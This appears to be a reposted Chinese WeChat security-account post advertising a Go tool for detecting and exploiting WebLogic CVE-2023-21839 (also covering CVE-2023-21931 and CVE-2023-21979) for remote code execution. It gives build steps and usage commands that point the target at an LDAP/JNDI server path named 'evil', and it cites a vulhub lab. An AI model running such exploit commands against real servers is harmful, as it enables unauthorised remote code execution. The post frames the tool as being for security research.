声明:该公众号分享的安全工具和项目均来源于网络,仅供安全研究与学习之用,如用于其他用途,由使用者承担全部法律及连带责任,与工具作者和本公众号无关。 |
现在只对常读和星标的公众号才展示大图推送,建议大家把Hack分享吧“设为星标”,否则可能看不到了!
项目简介
Weblogic CVE-2023-21839/CVE-2023-21931/CVE-2023-21979 一键检测工具,这是来自长亭xray的代码,该漏洞扫描已集成到新版本xray中。
无需任何Java依赖,构造协议通过socket直接RCE
已解决IIOP的NAT网络问题(可测试Docker与公网目标)
在Windows/Mac OS/Linux以及Weblogic 12/14中测试通过
请使用JDK 8u191以下启动Weblogic并自行搭建JNDI Server
注意:本PoC是针对CVE-2023-21839编写的,实际上同时覆盖了CVE-2023-21931和CVE-2023-21979。
工具使用
https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2023-21839
Linux/Mac OS
cd cmd
go build -o CVE-2023-21839
./CVE-2023-21839 -ip 127.0.0.1 -port 7001 -ldap ldap://127.0.0.1:1389/evil
Windows
cd cmd
go build -o CVE-2023-21839.exe
CVE-2023-21839.exe -ip 127.0.0.1 -port 7001 -ldap ldap://127.0.0.1:1389/evil
如果发现 panic 或有其他报错,说明目标不存在漏洞(或关闭了 IIOP 功能)
下载地址
回复关键字【230708】获取下载链接
信 安 考 证
CISP、PTE、PTS、DSG、IRE、IRS、NISP、PMP、CCSK、CISSP、ISO27001... |
往期推荐工具
原文始发于微信公众号(Hack分享吧):N!Weblogic CVE-2023-21839 RCE
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论